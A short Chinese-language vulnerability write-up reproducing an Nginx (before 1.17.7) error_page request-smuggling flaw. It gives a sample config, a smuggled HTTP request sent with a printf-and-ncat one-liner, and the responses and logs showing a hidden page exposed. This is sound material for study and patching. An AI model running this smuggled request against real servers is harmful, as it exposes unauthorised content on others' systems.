⼀、漏洞简介

Nginx 1.17.7之前版本中 error_page 存在安全漏洞。攻击者可利⽤该漏洞读取未授权的Web页⾯。

⼆、漏洞影响

Ngnix < 1.17.7

三、复现过程

错误代码

server { listen 80;

server_name localhost;

error_page 401 http://example.org; location / { return 401; }}

server { listen 80;

server_name notlocalhost; location /_hidden/index.html {

return 200 'This should be hidden!'; }}

这时候我们可以向服务器发送以下请求

GET /a HTTP/1.1Host: localhostContent-Length: 56

GET /_hidden/index.html HTTP/1.1Host: notlocalhost

我们看⼀下服务器是怎么处理的

printf \"GET /a HTTP/1.1\\r\\nHost: localhost\\r\\nContent-Length: 56\\r\\n\\r\\nGET

/_hidden/index.html HTTP/1.1\\r\\nHost: notlocalhost\\r\\n\\r\\n\" | ncat localhost 80 --noshutdown

等于说是吧两个请求都间接的执⾏了，我们看⼀下burp⾥⾯的返回值

HTTP/1.1 302 Moved TemporarilyServer: nginx/1.17.6

Date: Fri, 06 Dec 2019 18:23:33 GMTContent-Type: text/htmlContent-Length: 145Connection: keep-alive

Location: http://example.org

HTTP/1.1 200 OKServer: nginx/1.17.6

Date: Fri, 06 Dec 2019 18:23:33 GMTContent-Type: text/htmlContent-Length: 22Connection: keep-aliveThis should be hidden!

再⼀下nginx服务器⾥⾯的⽇志

172.17.0.1 - - [06/Dec/2019:18:23:33 +0000] \"GET /a HTTP/1.1\" 302 145 \"-\" \"-\" \"-\"

172.17.0.1 - - [06/Dec/2019:18:23:33 +0000] \"GET /_hidden/index.html HTTP/1.1\" 200 22 \"-\"